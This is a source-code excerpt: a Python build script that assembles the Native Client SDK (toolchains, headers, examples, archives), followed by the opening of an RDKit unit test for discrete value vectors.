SDK_EXAMPLE_DIR = os.path.join(SDK_SRC_DIR, 'examples')
SDK_LIBRARY_DIR = os.path.join(SDK_SRC_DIR, 'libraries')
SDK_DIR = os.path.dirname(SDK_SRC_DIR)
SRC_DIR = os.path.dirname(SDK_DIR)
NACL_DIR = os.path.join(SRC_DIR, 'native_client')
OUT_DIR = os.path.join(SRC_DIR, 'out')
PPAPI_DIR = os.path.join(SRC_DIR, 'ppapi')
# Add SDK make tools scripts to the python path.
sys.path.append(os.path.join(SDK_SRC_DIR, 'tools'))
sys.path.append(os.path.join(NACL_DIR, 'build'))
import getos
import http_download
import oshelpers
GSTORE = 'https://commondatastorage.googleapis.com/nativeclient-mirror/nacl/'
MAKE = 'nacl_sdk/make_3_81/make.exe'
CYGTAR = os.path.join(NACL_DIR, 'build', 'cygtar.py')
options = None
def GetGlibcToolchain(platform, arch):
tcdir = os.path.join(NACL_DIR, 'toolchain', '.tars')
tcname = 'toolchain_%s_%s.tar.bz2' % (platform, arch)
return os.path.join(tcdir, tcname)
def GetNewlibToolchain(platform, arch):
tcdir = os.path.join(NACL_DIR, 'toolchain', '.tars')
tcname = 'naclsdk_%s_%s.tgz' % (platform, arch)
return os.path.join(tcdir, tcname)
def GetPNaClToolchain(os_platform, arch):
tcdir = os.path.join(NACL_DIR, 'toolchain', '.tars')
tcname = 'naclsdk_pnacl_%s_%s.tgz' % (os_platform, arch)
return os.path.join(tcdir, tcname)
def GetScons():
if sys.platform in ['cygwin', 'win32']:
return 'scons.bat'
return './scons'
def GetArchName(arch, xarch=None):
if xarch:
return arch + '-' + str(xarch)
return arch
def GetToolchainNaClInclude(tcname, tcpath, arch, xarch=None):
if arch == 'x86':
if tcname == 'pnacl':
return os.path.join(tcpath, 'newlib', 'sdk', 'include')
return os.path.join(tcpath, 'x86_64-nacl', 'include')
else:
buildbot_common.ErrorExit('Unknown architecture.')
def GetToolchainNaClLib(tcname, tcpath, arch, xarch):
if arch == 'x86':
if tcname == 'pnacl':
return os.path.join(tcpath, 'newlib', 'sdk', 'lib')
if str(xarch) == '32':
return os.path.join(tcpath, 'x86_64-nacl', 'lib32')
if str(xarch) == '64':
return os.path.join(tcpath, 'x86_64-nacl', 'lib')
buildbot_common.ErrorExit('Unknown architecture.')
def GetPNaClNativeLib(tcpath, arch):
if arch not in ['arm', 'x86-32', 'x86-64']:
buildbot_common.ErrorExit('Unknown architecture %s.' % arch)
return os.path.join(tcpath, 'lib-' + arch)
def GetBuildArgs(tcname, tcpath, outdir, arch, xarch=None):
"""Return list of scons build arguments to generate user libraries."""
scons = GetScons()
mode = '--mode=opt-host,nacl'
arch_name = GetArchName(arch, xarch)
plat = 'platform=' + arch_name
binarg = 'bindir=' + os.path.join(outdir, 'tools')
lib = 'libdir=' + GetToolchainNaClLib(tcname, tcpath, arch, xarch)
args = [scons, mode, plat, binarg, lib, '-j10',
'install_bin', 'install_lib']
if tcname == 'glibc':
args.append('--nacl_glibc')
if tcname == 'pnacl':
args.append('bitcode=1')
print "Building %s (%s): %s" % (tcname, arch, ' '.join(args))
return args
def BuildStepDownloadToolchains(platform):
buildbot_common.BuildStep('Rerun hooks to get toolchains')
buildbot_common.Run(['gclient', 'runhooks'],
cwd=SRC_DIR, shell=(platform == 'win'))
def BuildStepCleanPepperDirs(pepperdir, pepperdir_old):
buildbot_common.BuildStep('Clean Pepper Dirs')
buildbot_common.RemoveDir(pepperdir_old)
buildbot_common.RemoveDir(pepperdir)
buildbot_common.MakeDir(pepperdir)
def BuildStepMakePepperDirs(pepperdir, subdirs):
for subdir in subdirs:
buildbot_common.MakeDir(os.path.join(pepperdir, subdir))
def BuildStepCopyTextFiles(pepperdir, pepper_ver, revision):
buildbot_common.BuildStep('Add Text Files')
files = ['AUTHORS', 'COPYING', 'LICENSE']
files = [os.path.join(SDK_SRC_DIR, filename) for filename in files]
oshelpers.Copy(['-v'] + files + [pepperdir])
# Replace a few placeholders in README
readme_text = open(os.path.join(SDK_SRC_DIR, 'README'), 'rt').read()
readme_text = readme_text.replace('${VERSION}', pepper_ver)
readme_text = readme_text.replace('${REVISION}', revision)
# Year/Month/Day Hour:Minute:Second
time_format = '%Y/%m/%d %H:%M:%S'
readme_text = readme_text.replace('${DATE}',
datetime.datetime.now().strftime(time_format))
open(os.path.join(pepperdir, 'README'), 'wt').write(readme_text)
def BuildStepUntarToolchains(pepperdir, platform, arch, toolchains):
buildbot_common.BuildStep('Untar Toolchains')
tcname = platform + '_' + arch
tmpdir = os.path.join(SRC_DIR, 'out', 'tc_temp')
buildbot_common.RemoveDir(tmpdir)
buildbot_common.MakeDir(tmpdir)
if 'newlib' in toolchains:
# Untar the newlib toolchains
tarfile = GetNewlibToolchain(platform, arch)
buildbot_common.Run([sys.executable, CYGTAR, '-C', tmpdir, '-xf', tarfile],
cwd=NACL_DIR)
# Then rename/move it to the pepper toolchain directory
srcdir = os.path.join(tmpdir, 'sdk', 'nacl-sdk')
newlibdir = os.path.join(pepperdir, 'toolchain', tcname + '_newlib')
buildbot_common.Move(srcdir, newlibdir)
if 'glibc' in toolchains:
# Untar the glibc toolchains
tarfile = GetGlibcToolchain(platform, arch)
buildbot_common.Run([sys.executable, CYGTAR, '-C', tmpdir, '-xf', tarfile],
cwd=NACL_DIR)
# Then rename/move it to the pepper toolchain directory
srcdir = os.path.join(tmpdir, 'toolchain', tcname)
glibcdir = os.path.join(pepperdir, 'toolchain', tcname + '_glibc')
buildbot_common.Move(srcdir, glibcdir)
# Untar the pnacl toolchains
if 'pnacl' in toolchains:
tmpdir = os.path.join(tmpdir, 'pnacl')
buildbot_common.RemoveDir(tmpdir)
buildbot_common.MakeDir(tmpdir)
tarfile = GetPNaClToolchain(platform, arch)
buildbot_common.Run([sys.executable, CYGTAR, '-C', tmpdir, '-xf', tarfile],
cwd=NACL_DIR)
# Then rename/move it to the pepper toolchain directory
pnacldir = os.path.join(pepperdir, 'toolchain', tcname + '_pnacl')
buildbot_common.Move(tmpdir, pnacldir)
if options.gyp and sys.platform not in ['cygwin', 'win32']:
# If the gyp options is specified we install a toolchain
# wrapper so that gyp can switch toolchains via a commandline
# option.
bindir = os.path.join(pepperdir, 'toolchain', tcname, 'bin')
wrapper = os.path.join(SDK_SRC_DIR, 'tools', 'compiler-wrapper.py')
buildbot_common.MakeDir(bindir)
buildbot_common.CopyFile(wrapper, bindir)
# Module 'os' has no 'symlink' member (on Windows).
# pylint: disable=E1101
os.symlink('compiler-wrapper.py', os.path.join(bindir, 'i686-nacl-g++'))
os.symlink('compiler-wrapper.py', os.path.join(bindir, 'i686-nacl-gcc'))
os.symlink('compiler-wrapper.py', os.path.join(bindir, 'i686-nacl-ar'))
HEADER_MAP = {
'newlib': {
'pthread.h': 'src/untrusted/pthread/pthread.h',
'semaphore.h': 'src/untrusted/pthread/semaphore.h',
'nacl/dynamic_annotations.h':
'src/untrusted/valgrind/dynamic_annotations.h',
'nacl/nacl_dyncode.h': 'src/untrusted/nacl/nacl_dyncode.h',
'nacl/nacl_startup.h': 'src/untrusted/nacl/nacl_startup.h',
'nacl/nacl_thread.h': 'src/untrusted/nacl/nacl_thread.h',
'pnacl.h': 'src/untrusted/nacl/pnacl.h',
'irt.h': 'src/untrusted/irt/irt.h',
'irt_ppapi.h': 'src/untrusted/irt/irt_ppapi.h',
},
'glibc': {
'nacl/dynamic_annotations.h':
'src/untrusted/valgrind/dynamic_annotations.h',
'nacl/nacl_dyncode.h': 'src/untrusted/nacl/nacl_dyncode.h',
'nacl/nacl_startup.h': 'src/untrusted/nacl/nacl_startup.h',
'nacl/nacl_thread.h': 'src/untrusted/nacl/nacl_thread.h',
'pnacl.h': 'src/untrusted/nacl/pnacl.h',
'irt.h': 'src/untrusted/irt/irt.h',
'irt_ppapi.h': 'src/untrusted/irt/irt_ppapi.h',
},
'libs': {
},
}
def InstallHeaders(tc_dst_inc, pepper_ver, tc_name):
"""Copies NaCl headers to expected locations in the toolchain."""
tc_map = HEADER_MAP[tc_name]
for filename in tc_map:
src = os.path.join(NACL_DIR, tc_map[filename])
dst = os.path.join(tc_dst_inc, filename)
buildbot_common.MakeDir(os.path.dirname(dst))
buildbot_common.CopyFile(src, dst)
# Clean out per toolchain ppapi directory
ppapi = os.path.join(tc_dst_inc, 'ppapi')
buildbot_common.RemoveDir(ppapi)
# Copy in c and c/dev headers
buildbot_common.MakeDir(os.path.join(ppapi, 'c', 'dev'))
buildbot_common.CopyDir(os.path.join(PPAPI_DIR, 'c', '*.h'),
os.path.join(ppapi, 'c'))
buildbot_common.CopyDir(os.path.join(PPAPI_DIR, 'c', 'dev', '*.h'),
os.path.join(ppapi, 'c', 'dev'))
# Run the generator to overwrite IDL files
generator_args = [sys.executable, 'generator.py', '--wnone', '--cgen',
'--verbose', '--dstroot=%s/c' % ppapi]
if pepper_ver:
generator_args.append('--release=M' + pepper_ver)
buildbot_common.Run(generator_args,
cwd=os.path.join(PPAPI_DIR, 'generators'))
# Remove private and trusted interfaces
buildbot_common.RemoveDir(os.path.join(ppapi, 'c', 'private'))
buildbot_common.RemoveDir(os.path.join(ppapi, 'c', 'trusted'))
# Copy in the C++ headers
buildbot_common.MakeDir(os.path.join(ppapi, 'cpp', 'dev'))
buildbot_common.CopyDir(os.path.join(PPAPI_DIR, 'cpp', '*.h'),
os.path.join(ppapi, 'cpp'))
buildbot_common.CopyDir(os.path.join(PPAPI_DIR, 'cpp', 'dev', '*.h'),
os.path.join(ppapi, 'cpp', 'dev'))
buildbot_common.MakeDir(os.path.join(ppapi, 'utility', 'graphics'))
buildbot_common.MakeDir(os.path.join(ppapi, 'utility', 'threading'))
buildbot_common.MakeDir(os.path.join(ppapi, 'utility', 'websocket'))
buildbot_common.CopyDir(os.path.join(PPAPI_DIR, 'utility', '*.h'),
os.path.join(ppapi, 'utility'))
buildbot_common.CopyDir(os.path.join(PPAPI_DIR, 'utility', 'graphics', '*.h'),
os.path.join(ppapi, 'utility', 'graphics'))
buildbot_common.CopyDir(
os.path.join(PPAPI_DIR, 'utility', 'threading', '*.h'),
os.path.join(ppapi, 'utility', 'threading'))
buildbot_common.CopyDir(
os.path.join(PPAPI_DIR, 'utility', 'websocket', '*.h'),
os.path.join(ppapi, 'utility', 'websocket'))
# Copy in the gles2 headers
buildbot_common.MakeDir(os.path.join(ppapi, 'gles2'))
buildbot_common.CopyDir(os.path.join(PPAPI_DIR, 'lib', 'gl', 'gles2', '*.h'),
os.path.join(ppapi, 'gles2'))
# Copy the EGL headers
buildbot_common.MakeDir(os.path.join(tc_dst_inc, 'EGL'))
buildbot_common.CopyDir(
os.path.join(PPAPI_DIR, 'lib', 'gl', 'include', 'EGL', '*.h'),
os.path.join(tc_dst_inc, 'EGL'))
# Copy the GLES2 headers
buildbot_common.MakeDir(os.path.join(tc_dst_inc, 'GLES2'))
buildbot_common.CopyDir(
os.path.join(PPAPI_DIR, 'lib', 'gl', 'include', 'GLES2', '*.h'),
os.path.join(tc_dst_inc, 'GLES2'))
# Copy the KHR headers
buildbot_common.MakeDir(os.path.join(tc_dst_inc, 'KHR'))
buildbot_common.CopyDir(
os.path.join(PPAPI_DIR, 'lib', 'gl', 'include', 'KHR', '*.h'),
os.path.join(tc_dst_inc, 'KHR'))
# Copy the lib files
buildbot_common.CopyDir(os.path.join(PPAPI_DIR, 'lib'),
os.path.join(tc_dst_inc, 'ppapi'))
def MakeNinjaRelPath(path):
return os.path.join(os.path.relpath(OUT_DIR, SRC_DIR), path)
def GypNinjaBuild_X86(pepperdir, platform, toolchains):
build_dir = 'gypbuild'
GypNinjaBuild_X86_Nacl(platform, build_dir)
GypNinjaBuild_X86_Chrome(build_dir)
ninja_out_dir = os.path.join(OUT_DIR, build_dir, 'Release')
# src_file, dst_file, is_host_exe?
tools_files = [
('sel_ldr', 'sel_ldr_x86_32', True),
('ncval_x86_32', 'ncval_x86_32', True),
('ncval_arm', 'ncval_arm', True),
('irt_core_newlib_x32.nexe', 'irt_core_newlib_x32.nexe', False),
('irt_core_newlib_x64.nexe', 'irt_core_newlib_x64.nexe', False),
]
if platform != 'mac':
# Mac doesn't build 64-bit binaries.
tools_files.append(('sel_ldr64', 'sel_ldr_x86_64', True))
tools_files.append(('ncval_x86_64', 'ncval_x86_64', True))
if platform == 'linux':
tools_files.append(('nacl_helper_bootstrap',
'nacl_helper_bootstrap_x86_32', True))
tools_files.append(('nacl_helper_bootstrap64',
'nacl_helper_bootstrap_x86_64', True))
buildbot_common.MakeDir(os.path.join(pepperdir, 'tools'))
for src, dst, host_exe in tools_files:
if platform == 'win' and host_exe:
src += '.exe'
dst += '.exe'
buildbot_common.CopyFile(
os.path.join(ninja_out_dir, src),
os.path.join(pepperdir, 'tools', dst))
for tc in set(toolchains) & set(['newlib', 'glibc']):
for bits in '32', '64':
tc_dir = 'tc_' + tc
lib_dir = 'lib' + bits
src_dir = os.path.join(ninja_out_dir, 'gen', tc_dir, lib_dir)
tcpath = os.path.join(pepperdir, 'toolchain',
'%s_x86_%s' % (platform, tc))
dst_dir = GetToolchainNaClLib(tc, tcpath, 'x86', bits)
buildbot_common.MakeDir(dst_dir)
buildbot_common.CopyDir(os.path.join(src_dir, '*.a'), dst_dir)
if tc == 'newlib':
buildbot_common.CopyDir(os.path.join(src_dir, '*.o'), dst_dir)
if tc == 'glibc':
buildbot_common.CopyDir(os.path.join(src_dir, '*.so'), dst_dir)
# TODO(binji): temporary hack; copy crt1.o from sdk toolchain directory.
lib_dir = os.path.join(ninja_out_dir, 'gen', 'sdk', 'toolchain',
'%s_x86_%s' % (platform, tc), 'x86_64-nacl', 'lib')
if bits == '32':
lib_dir += '32'
buildbot_common.CopyFile(os.path.join(lib_dir, 'crt1.o'), dst_dir)
def GypNinjaBuild_X86_Nacl(platform, rel_out_dir):
gyp_py = os.path.join(NACL_DIR, 'build', 'gyp_nacl')
nacl_core_sdk_gyp = os.path.join(NACL_DIR, 'build', 'nacl_core_sdk.gyp')
all_gyp = os.path.join(NACL_DIR, 'build', 'all.gyp')
out_dir = MakeNinjaRelPath(rel_out_dir)
GypNinjaBuild('ia32', gyp_py, nacl_core_sdk_gyp, 'nacl_core_sdk', out_dir)
GypNinjaBuild('ia32', gyp_py, all_gyp, 'ncval_x86_32', out_dir)
GypNinjaBuild(None, gyp_py, all_gyp, 'ncval_arm', out_dir)
if platform == 'win':
NinjaBuild('sel_ldr64', out_dir)
NinjaBuild('ncval_x86_64', out_dir)
elif platform == 'linux':
out_dir_64 = MakeNinjaRelPath(rel_out_dir + '_64')
GypNinjaBuild('x64', gyp_py, nacl_core_sdk_gyp, 'sel_ldr', out_dir_64)
GypNinjaBuild('x64', gyp_py, all_gyp, 'ncval_x86_64', out_dir_64)
# We only need sel_ldr and ncval_x86_64 from the 64-bit out directory.
# sel_ldr needs to be renamed, so we'll call it sel_ldr64.
files_to_copy = [
('sel_ldr', 'sel_ldr64'),
('ncval_x86_64', 'ncval_x86_64'),
]
files_to_copy.append(('nacl_helper_bootstrap', 'nacl_helper_bootstrap64'))
for src, dst in files_to_copy:
buildbot_common.CopyFile(
os.path.join(SRC_DIR, out_dir_64, 'Release', src),
os.path.join(SRC_DIR, out_dir, 'Release', dst))
def GypNinjaBuild_X86_Chrome(rel_out_dir):
gyp_py = os.path.join(SRC_DIR, 'build', 'gyp_chromium')
out_dir = MakeNinjaRelPath(rel_out_dir)
gyp_file = os.path.join(SRC_DIR, 'ppapi', 'ppapi_untrusted.gyp')
targets = ['ppapi_cpp_lib', 'ppapi_gles2_lib']
GypNinjaBuild('ia32', gyp_py, gyp_file, targets, out_dir)
gyp_file = os.path.join(SRC_DIR, 'ppapi', 'native_client',
'native_client.gyp')
GypNinjaBuild('ia32', gyp_py, gyp_file, 'ppapi_lib', out_dir)
def GypNinjaBuild_Pnacl(rel_out_dir, target_arch):
# TODO(binji): This will build the pnacl_irt_shim twice; once as part of the
# Chromium build, and once here. When we move more of the SDK build process
# to gyp, we can remove this.
gyp_py = os.path.join(SRC_DIR, 'build', 'gyp_chromium')
out_dir = MakeNinjaRelPath(rel_out_dir)
gyp_file = os.path.join(SRC_DIR, 'ppapi', 'native_client', 'src',
'untrusted', 'pnacl_irt_shim', 'pnacl_irt_shim.gyp')
targets = ['pnacl_irt_shim']
GypNinjaBuild(target_arch, gyp_py, gyp_file, targets, out_dir)
def GypNinjaBuild(arch, gyp_py_script, gyp_file, targets, out_dir):
gyp_env = copy.copy(os.environ)
gyp_env['GYP_GENERATORS'] = 'ninja'
gyp_defines = []
if options.mac_sdk:
gyp_defines.append('mac_sdk=%s' % options.mac_sdk)
if arch:
gyp_defines.append('target_arch=%s' % arch)
gyp_env['GYP_DEFINES'] = ' '.join(gyp_defines)
gyp_generator_flags = ['-G', 'output_dir=%s' % (out_dir,)]
gyp_depth = '--depth=.'
buildbot_common.Run(
[sys.executable, gyp_py_script, gyp_file, gyp_depth] + \
gyp_generator_flags,
cwd=SRC_DIR,
env=gyp_env)
NinjaBuild(targets, out_dir)
def NinjaBuild(targets, out_dir):
if type(targets) is not list:
targets = [targets]
out_config_dir = os.path.join(out_dir, 'Release')
buildbot_common.Run(['ninja', '-C', out_config_dir] + targets, cwd=SRC_DIR)
def BuildStepBuildToolchains(pepperdir, platform, arch, pepper_ver,
toolchains):
buildbot_common.BuildStep('SDK Items')
tcname = platform + '_' + arch
newlibdir = os.path.join(pepperdir, 'toolchain', tcname + '_newlib')
glibcdir = os.path.join(pepperdir, 'toolchain', tcname + '_glibc')
pnacldir = os.path.join(pepperdir, 'toolchain', tcname + '_pnacl')
# Run scons TC build steps
if arch == 'x86':
if set(toolchains) & set(['newlib', 'glibc']):
GypNinjaBuild_X86(pepperdir, platform, toolchains)
if 'newlib' in toolchains:
InstallHeaders(GetToolchainNaClInclude('newlib', newlibdir, 'x86'),
pepper_ver,
'newlib')
if 'glibc' in toolchains:
InstallHeaders(GetToolchainNaClInclude('glibc', glibcdir, 'x86'),
pepper_ver,
'glibc')
if 'pnacl' in toolchains:
shell = platform == 'win'
buildbot_common.Run(
GetBuildArgs('pnacl', pnacldir, pepperdir, 'x86', '32'),
cwd=NACL_DIR, shell=shell)
buildbot_common.Run(
GetBuildArgs('pnacl', pnacldir, pepperdir, 'x86', '64'),
cwd=NACL_DIR, shell=shell)
for arch in ('ia32', 'arm'):
# Fill in the latest native pnacl shim library from the chrome build.
GypNinjaBuild_Pnacl('gypbuild-' + arch, arch)
release_build_dir = os.path.join(OUT_DIR, 'gypbuild-' + arch,
'Release')
pnacl_libdir_map = { 'ia32': 'x86-64', 'arm': 'arm' }
buildbot_common.CopyFile(
os.path.join(release_build_dir, 'libpnacl_irt_shim.a'),
GetPNaClNativeLib(pnacldir, pnacl_libdir_map[arch]))
InstallHeaders(GetToolchainNaClInclude('pnacl', pnacldir, 'x86'),
pepper_ver,
'newlib')
else:
buildbot_common.ErrorExit('Missing arch %s' % arch)
def BuildStepCopyBuildHelpers(pepperdir, platform):
buildbot_common.BuildStep('Copy build helpers')
buildbot_common.CopyDir(os.path.join(SDK_SRC_DIR, 'tools', '*.py'),
os.path.join(pepperdir, 'tools'))
if platform == 'win':
buildbot_common.BuildStep('Add MAKE')
http_download.HttpDownload(GSTORE + MAKE,
os.path.join(pepperdir, 'tools', 'make.exe'))
EXAMPLE_LIST = [
'debugging',
'dlopen',
'file_histogram',
'file_io',
'gamepad',
'geturl',
'hello_nacl_mounts',
'hello_world',
'hello_world_gles',
'hello_world_interactive',
'input_events',
'load_progress',
'mouselock',
'pi_generator',
'sine_synth',
'websocket',
]
LIBRARY_LIST = [
'nacl_mounts',
'ppapi',
'ppapi_cpp',
'ppapi_gles2',
'pthread',
]
LIB_DICT = {
'linux': [],
'mac': [],
'win': ['x86_32']
}
def MakeDirectoryOrClobber(pepperdir, dirname, clobber):
dirpath = os.path.join(pepperdir, dirname)
if clobber:
buildbot_common.RemoveDir(dirpath)
buildbot_common.MakeDir(dirpath)
return dirpath
def BuildStepCopyExamples(pepperdir, toolchains, build_experimental, clobber):
buildbot_common.BuildStep('Copy examples')
if not os.path.exists(os.path.join(pepperdir, 'tools')):
buildbot_common.ErrorExit('Examples depend on missing tools.')
if not os.path.exists(os.path.join(pepperdir, 'toolchain')):
buildbot_common.ErrorExit('Examples depend on missing toolchains.')
exampledir = MakeDirectoryOrClobber(pepperdir, 'examples', clobber)
libdir = MakeDirectoryOrClobber(pepperdir, 'lib', clobber)
plat = getos.GetPlatform()
for arch in LIB_DICT[plat]:
buildbot_common.MakeDir(os.path.join(libdir, '%s_%s_host' % (plat, arch)))
if options.gyp and plat != 'win':
configs = ['debug', 'release']
else:
configs = ['Debug', 'Release']
for config in configs:
buildbot_common.MakeDir(os.path.join(libdir, '%s_%s_host' % (plat, arch),
config))
MakeDirectoryOrClobber(pepperdir, 'src', clobber)
# Copy individual files
files = ['favicon.ico', 'httpd.cmd']
for filename in files:
oshelpers.Copy(['-v', os.path.join(SDK_EXAMPLE_DIR, filename), exampledir])
args = ['--dstroot=%s' % pepperdir, '--master']
for toolchain in toolchains:
args.append('--' + toolchain)
for example in EXAMPLE_LIST:
dsc = os.path.join(SDK_EXAMPLE_DIR, example, 'example.dsc')
args.append(dsc)
for library in LIBRARY_LIST:
dsc = os.path.join(SDK_LIBRARY_DIR, library, 'library.dsc')
args.append(dsc)
if build_experimental:
args.append('--experimental')
if generate_make.main(args):
buildbot_common.ErrorExit('Failed to build examples.')
def GetWindowsEnvironment():
sys.path.append(os.path.join(NACL_DIR, 'buildbot'))
import buildbot_standard
# buildbot_standard.SetupWindowsEnvironment expects a "context" object. We'll
# fake enough of that here to work.
class FakeContext(object):
def __init__(self):
self.env = os.environ
def GetEnv(self, key):
return self.env[key]
def __getitem__(self, key):
return self.env[key]
def SetEnv(self, key, value):
self.env[key] = value
def __setitem__(self, key, value):
self.env[key] = value
context = FakeContext()
buildbot_standard.SetupWindowsEnvironment(context)
# buildbot_standard.SetupWindowsEnvironment adds the directory which contains
# vcvarsall.bat to the path, but not the directory which contains cl.exe,
# link.exe, etc.
# Running vcvarsall.bat adds the correct directories to the path, which we
# extract below.
process = subprocess.Popen('vcvarsall.bat x86 > NUL && set',
stdout=subprocess.PIPE, env=context.env, shell=True)
stdout, _ = process.communicate()
# Parse environment from "set" command above.
# It looks like this:
# KEY1=VALUE1\r\n
# KEY2=VALUE2\r\n
# ...
return dict(line.split('=') for line in stdout.split('\r\n')[:-1])
def BuildStepMakeAll(pepperdir, platform, directory, step_name, clean=False):
buildbot_common.BuildStep(step_name)
make_dir = os.path.join(pepperdir, directory)
makefile = os.path.join(make_dir, 'Makefile')
if os.path.isfile(makefile):
print "\n\nMake: " + make_dir
if platform == 'win':
# We need to modify the environment to build host on Windows.
env = GetWindowsEnvironment()
make = os.path.join(make_dir, 'make.bat')
else:
env = os.environ
make = 'make'
buildbot_common.Run([make, '-j8'],
cwd=os.path.abspath(make_dir), env=env)
if clean:
# Clean to remove temporary files but keep the built libraries.
buildbot_common.Run([make, '-j8', 'clean'],
cwd=os.path.abspath(make_dir))
def BuildStepBuildLibraries(pepperdir, platform, directory, clean=True):
BuildStepMakeAll(pepperdir, platform, directory, 'Build Libraries',
clean=clean)
def BuildStepGenerateNotice(pepperdir):
# Look for LICENSE files
license_filenames_re = re.compile('LICENSE|COPYING')
license_files = []
for root, _, files in os.walk(pepperdir):
for filename in files:
if license_filenames_re.match(filename):
path = os.path.join(root, filename)
license_files.append(path)
print '\n'.join(license_files)
notice_filename = os.path.join(pepperdir, 'NOTICE')
generate_notice.Generate(notice_filename, pepperdir, license_files)
def BuildStepTarBundle(pepper_ver, tarfile):
buildbot_common.BuildStep('Tar Pepper Bundle')
buildbot_common.MakeDir(os.path.dirname(tarfile))
buildbot_common.Run([sys.executable, CYGTAR, '-C', OUT_DIR, '-cjf', tarfile,
'pepper_' + pepper_ver], cwd=NACL_DIR)
def BuildStepRunTests():
args = []
if options.build_experimental:
args.append('--experimental')
if options.run_pyauto_tests:
args.append('--pyauto')
test_sdk.main(args)
def GetManifestBundle(pepper_ver, revision, tarfile, archive_url):
with open(tarfile, 'rb') as tarfile_stream:
archive_sha1, archive_size = manifest_util.DownloadAndComputeHash(
tarfile_stream)
archive = manifest_util.Archive(manifest_util.GetHostOS())
archive.url = archive_url
archive.size = archive_size
archive.checksum = archive_sha1
bundle = manifest_util.Bundle('pepper_' + pepper_ver)
bundle.revision = int(revision)
bundle.repath = 'pepper_' + pepper_ver
bundle.version = int(pepper_ver)
bundle.description = 'Chrome %s bundle, revision %s' % (pepper_ver, revision)
bundle.stability = 'dev'
bundle.recommended = 'no'
bundle.archives = [archive]
return bundle
def BuildStepArchiveBundle(pepper_ver, revision, tarfile):
buildbot_common.BuildStep('Archive build')
bucket_path = 'nativeclient-mirror/nacl/nacl_sdk/%s' % (
build_utils.ChromeVersion(),)
tarname = os.path.basename(tarfile)
tarfile_dir = os.path.dirname(tarfile)
buildbot_common.Archive(tarname, bucket_path, tarfile_dir)
# generate "manifest snippet" for this archive.
archive_url = GSTORE + 'nacl_sdk/%s/%s' % (
build_utils.ChromeVersion(), tarname)
bundle = GetManifestBundle(pepper_ver, revision, tarfile, archive_url)
manifest_snippet_file = os.path.join(OUT_DIR, tarname + '.json')
with open(manifest_snippet_file, 'wb') as manifest_snippet_stream:
manifest_snippet_stream.write(bundle.GetDataAsString())
buildbot_common.Archive(tarname + '.json', bucket_path, OUT_DIR,
step_link=False)
def BuildStepArchiveSDKTools():
# Only push up sdk_tools.tgz and nacl_sdk.zip on the linux buildbot.
builder_name = os.getenv('BUILDBOT_BUILDERNAME', '')
if builder_name == 'linux-sdk-multi':
buildbot_common.BuildStep('Build SDK Tools')
build_updater.BuildUpdater(OUT_DIR)
buildbot_common.BuildStep('Archive SDK Tools')
bucket_path = 'nativeclient-mirror/nacl/nacl_sdk/%s' % (
build_utils.ChromeVersion(),)
buildbot_common.Archive('sdk_tools.tgz', bucket_path, OUT_DIR,
step_link=False)
buildbot_common.Archive('nacl_sdk.zip', bucket_path, OUT_DIR,
step_link=False)
def main(args):
parser = optparse.OptionParser()
parser.add_option('--run-tests',
help='Run tests. This includes building examples.', action='store_true')
parser.add_option('--run-pyauto-tests',
help='Run the pyauto tests for examples.', action='store_true')
parser.add_option('--skip-tar', help='Skip generating a tarball.',
action='store_true')
parser.add_option('--archive', help='Force the archive step.',
action='store_true')
parser.add_option('--gyp',
help='Use gyp to build examples/libraries/Makefiles.',
action='store_true')
parser.add_option('--release', help='PPAPI release version.',
dest='release', default=None)
parser.add_option('--experimental',
help='build experimental examples and libraries', action='store_true',
dest='build_experimental')
parser.add_option('--skip-toolchain', help='Skip toolchain download/untar',
action='store_true')
parser.add_option('--mac_sdk',
help='Set the mac_sdk (e.g. 10.6) to use when building with ninja.',
dest='mac_sdk')
global options
options, args = parser.parse_args(args[1:])
platform = getos.GetPlatform()
arch = 'x86'
generate_make.use_gyp = options.gyp
# TODO(binji) for now, only test examples on non-trybots. Trybots don't build
# pyauto Chrome.
if buildbot_common.IsSDKBuilder():
options.run_tests = True
options.run_pyauto_tests = True
options.archive = True
if buildbot_common.IsSDKTrybot():
options.run_tests = True
toolchains = ['newlib', 'glibc', 'pnacl', 'host']
print 'Building: ' + ' '.join(toolchains)
if options.archive and options.skip_tar:
parser.error('Incompatible arguments with archive.')
pepper_ver = str(int(build_utils.ChromeMajorVersion()))
pepper_old = str(int(build_utils.ChromeMajorVersion()) - 1)
pepperdir = os.path.join(SRC_DIR, 'out', 'pepper_' + pepper_ver)
pepperdir_old = os.path.join(SRC_DIR, 'out', 'pepper_' + pepper_old)
clnumber = build_utils.ChromeRevision()
tarname = 'naclsdk_' + platform + '.tar.bz2'
tarfile = os.path.join(OUT_DIR, tarname)
if options.release:
pepper_ver = options.release
print 'Building PEPPER %s at %s' % (pepper_ver, clnumber)
if 'NACL_SDK_ROOT' in os.environ:
# We don't want the currently configured NACL_SDK_ROOT to have any effect
# of the build.
del os.environ['NACL_SDK_ROOT']
if not options.skip_toolchain:
BuildStepDownloadToolchains(platform)
BuildStepCleanPepperDirs(pepperdir, pepperdir_old)
BuildStepMakePepperDirs(pepperdir, ['include', 'toolchain', 'tools'])
BuildStepCopyTextFiles(pepperdir, pepper_ver, clnumber)
if not options.skip_toolchain:
BuildStepUntarToolchains(pepperdir, platform, arch, toolchains)
BuildStepBuildToolchains(pepperdir, platform, arch, pepper_ver, toolchains)
InstallHeaders(os.path.join(pepperdir, 'include'), None, 'libs')
BuildStepCopyBuildHelpers(pepperdir, platform)
BuildStepCopyExamples(pepperdir, toolchains, options.build_experimental, True)
# Ship with libraries prebuilt, so run that first.
BuildStepBuildLibraries(pepperdir, platform, 'src')
BuildStepGenerateNotice(pepperdir)
if not options.skip_tar:
BuildStepTarBundle(pepper_ver, tarfile)
if options.run_tests:
BuildStepRunTests()
# Archive on non-trybots.
if options.archive:
BuildStepArchiveBundle(pepper_ver, clnumber, tarfile)
BuildStepArchiveSDKTools()
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
leighpauls/k2cro4
|
native_client_sdk/src/build_tools/build_sdk.py
|
Python
|
bsd-3-clause
| 31,480
|
# $Id$
#
# Copyright (C) 2007,2008 Greg Landrum
#
# @@ All Rights Reserved @@
#
import os
import sys
import unittest
from rdkit import RDConfig
#import pickle
from rdkit.six.moves import cPickle as pickle
from rdkit import DataStructs as ds
class TestCase(unittest.TestCase):
def setUp(self) :
pass
def test1Discrete(self):
v1 = ds.DiscreteValueVect(ds.DiscreteValueType.ONEBITVALUE, 30)
for i in range(15):
v1[2*i] = 1;
self.assertTrue(len(v1) == 30)
self.assertTrue(v1.GetTotalVal() == 15)
for i in range(len(v1)):
self.assertTrue(v1[i] == (i+1)%2)
